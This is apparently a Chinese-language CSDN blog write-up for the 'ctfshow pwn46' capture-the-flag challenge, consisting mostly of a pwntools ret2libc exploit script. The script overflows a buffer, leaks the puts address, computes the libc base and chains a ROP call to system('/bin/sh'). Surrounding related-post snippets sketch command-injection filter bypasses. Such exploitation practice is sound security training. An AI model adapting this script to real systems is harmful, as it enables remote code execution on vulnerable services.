ctfshow pwn46

于 2024-07-07 14:01:40 发布
阅读量139 收藏
点赞数 1
分类专栏: PWN 网络安全 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/KaliLinux_V/article/details/140245496
版权

简单的64位ret2libc

from pwn import *
from LibcSearcher import *

# context(log_level='debug',arch='i386', os='linux')
context(log_level='debug',arch='amd64', os='linux')


pwnfile = "./pwn"
io = remote("pwn.challenge.ctf.show", 28129)
# io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.27.so")

s       = lambda data               :io.send(data)
sa      = lambda delim,data         :io.sendafter(delim, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(delim, data)
r       = lambda num=4096           :io.recv(num)
ru      = lambda delims		    :io.recvuntil(delims)
itr     = lambda                    :io.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
lg      = lambda address,data       :log.success('%s: '%(address)+hex(data))

leak_name = "puts"
leak_plt = elf.plt[leak_name]
leak_got = elf.got[leak_name]
ret_addr = elf.symbols["ctfshow"]
ret =  0x00000000004004fe
pop_rdi = 0x0000000000400803

payload = b"a"*(0x70+8)+p64(pop_rdi)+p64(leak_got)+p64(leak_plt)+p64(ret_addr)
ru("O.o?")
sl(payload)

ru("\n")
puts_addr = uu64(r(6))
print("puts_addr------------------>: ",hex(puts_addr))
libc  = LibcSearcher("puts",puts_addr)
base_addr = puts_addr-libc.dump("puts")
print("base_addr-----------------:",hex(base_addr))

system_addr = base_addr+libc.dump("system")
binsh = base_addr+libc.dump("str_bin_sh")
payload = b"a"*(0x70+8)+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system_addr)
sl(payload)
sl("cat flag")


itr()
saulgoodman-q
关注
专栏目录
CTFshow-PWN入门-栈溢出pwn35~pwn40
weixin_63576152的博客
08-22 1251
本文主要详解CTFshow中pwn入门系列的栈溢出模块的前6题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope参考文章:以下操作中小编用的都是自己的kali环境。
ctfshow pwn
zip471642048的博客
06-04 495
ctfshow pwn系列
ctfshow pwn45
saulgoodman的博客
07-06 155
简单的ret2libc。
CTFshow-PWN-栈溢出(pwn45)
Welcome To Myon'Blog !
05-20 508
我们一般常用的方法是采用 got 表泄露,即输出某个函数对应的 got 表项的内容,由于 libc 的延迟绑定机制,我们需要泄漏已经执行过的函数的地址。system 函数属于libc,而 libc.so 动态链接库中的函数之间相对偏移是固定的,即使程序有 ASLR 保护,也只是针对于地址中间位进行随机,最低的 12 位并不会发生改变。PLT用于间接调用共享库中的函数。这些方法和函数通常用于在漏洞利用过程中查找特定函数的地址(例如 system 函数)或特定字符串的地址(例如 /bin/sh 字符串)。
ctfshow 命令执行46关到70关 解题思路 理解及答案
2301_78362619的博客
12-28 1750
ctfshow我看行
Ctfshow web入门-web45 WP
qq_45427131的博客
05-18 209
web45 关于黑洞的传送门 传送门1 传送门2 preg_match函数多了对空格的过滤 空格可以用${IFS}和%0a代替绕过过滤 常规的后面一个变量写入黑洞,直接构造payload: http://9e400eba-95d3-409c-b50a-451ff5a2d4a2.challenge.ctf.show:8080/?c=ls%26%26ls 用${IFS}代替空格,构造payload ...
ctfshow pwn4
qq_39980610的博客
08-22 684
我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖 ebp、eip 等,从而达到劫持控制流的目的。当启用栈保护后,函数开始执行的时候会先往栈底插入 cookie 信息,当函数真正返回的时候会验证 cookie 信息是否合法 (栈帧销毁前测试该值是否被改变),如果不合法就停止程序运行 (栈溢出发生)。当程序停止在比对canary的时候我们可以看到栈上的0xc有了一个数据其实就是canary。我们可以分别将断点下在printf函数和程序比对canary的地址。
ctfshow pwn7
qq_39980610的博客
08-22 540
pwn7
Ctfshow pwn 02(自己做出的第一道pwn题)
weixin_64875092的博客
12-05 5356
算是一篇第一次做出pwn题的日记了! 本文写给想要入门pwn但只安装好虚拟机和ida完全不知道怎么用的小白~ 有许多写的不严谨或无脑的地方请多包涵! 其中有许多我在做题时踩到的坑(因为自己零基础实在不知道怎么问也不知道去问谁而导致浪费好多时间而进行不下去) 现在开始! 首先第一步,来到ctfshow的网站,找到这道pwn02 之后点击Launch an instance(这所是一个建立连接的步骤,少了这一步在使用python3时会出现如下报错)如果问我什么是python3,请耐心看下去
ctfshow pwn3
qq_39980610的博客
08-19 573
所以如果我们知道 libc 中某个函数的地址,那么我们就可以确定该程序利用的 libc。此外,在得到 libc 之后,其实 libc 中也是有 /bin/sh 字符串的,所以我们可以一起获得 /bin/sh 字符串的地址。我们一般常用的方法是采用 got 表泄露,即输出某个函数对应的 got 表项的内容。然后接受到的地址就是程序在libc中的地址我们就可以确定libc的版本和libc基址。函数在libc中的偏移都是固定的我们可以通过基址加偏移拿到函数地址和binsh字段。然后我们再构造rop链。
CTFshow-PWN入门-栈溢出pwn41~pwn48
weixin_63576152的博客
08-25 1466
本文主要详解CTFshow中pwn入门系列的栈溢出模块的其中x题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope以下操作中小编用的都是自己的kali环境。
buuctf习题pwn(41~50)
yw__y的博客
09-27 349
堆的题还没写
CTFshow-pwn入门-栈溢出 (慢慢更
akdelt的博客
01-31 1535
当应用程序试图对无权访问的内存地址进行读写操作时,会调用 sigsegv_handler 函数,sigsegv_handler 函数 会把stderr打印输出,即将flag的值打印输出那么我们直接输入超长数据就会溢出,程序就会崩溃进而打印出flag。char dest;该函数无法限制输入的长度,可能会超出s数组的容量,导致覆盖栈上的其他数据或执行任意代码。这也是明显的栈溢出漏洞,且提供后门函数 get_flag()堆栈不可执行,不过有后门函数,跟进 ctfshow 函数,read 可以读取 50 个字节。
CTFshow-pwn入门-栈溢出pwn43-pwn44
T1ngSh0w的博客
12-27 1349
CTFshow-pwn入门-栈溢出pwn43-pwn44
ctfshow web入门 {45-54}
weixin_58519918的博客
03-24 3733
Web(45) 空格过滤了这里的空格是ascll里的空格,我们可以用tab(%09)来通过 ?c=tac%09fla*||ls Web(46) a && b === if(a) { b },&&是同时必须满足的意思。a || b === if(!a) { b },||是或者的意思。 /?c=tac%09fla?.php%26%26ls 因为这是ascll码所以在转换时%09不会转换成0数字在30到39 . &&为%26%26 ASCLL
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8482
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
ICEEMDAN-IMPA-LSTM时间序列预测Matlab完整源码
最新发布
09-30
1.Matlab实现ICEEMDAN-IMPA-LSTM时间序列预测(改进自适应经验模态分解结合改进海洋捕食者算法优化长短期记忆神经网络时间序列预测),功率预测,先用ICEEMDAN对时间序列进行分解,然后对每个分量单独使用IMPA-LSTM预测,然后相加得到最终预测结果; ICEEMDAN-IMPA-LSTM功率/风速预测 基于改进的自适应经验模态分解+改进海洋捕食者算法+长短期记忆网络时间序列预测~组合预测,分解时避免了传统经验模态分解的一些固有缺陷,效果更佳,并通过改进的海洋捕食者算法对LSTM四个参数进行寻优,最后对每个分量建立LSTM模型进行预测后叠加集成,全新组合预测,出图多且精美~ 改进点如下:通过一个新的自适应参数来控制捕食者移动的步长,并使用非线性参数作为控制参数来平衡NMPA的探索和开发阶段,有效提高其搜索精度与收敛速度。 2.运行环境为Matlab2020b; 3.时间序列预测; 4.data为数据集,excel数据,单变量时间序列数据集,main.m为主程序,运行即可,所有文件放在一个文件夹; 5.命令窗口输出R2、MSE、MAE、MAPE和RMSE多指标评价。
大型数据机房总包工程EPC项目管理技术方案(152页).docx
09-30
大型数据机房总包工程EPC项目管理技术方案(152页)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

saulgoodman-q

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值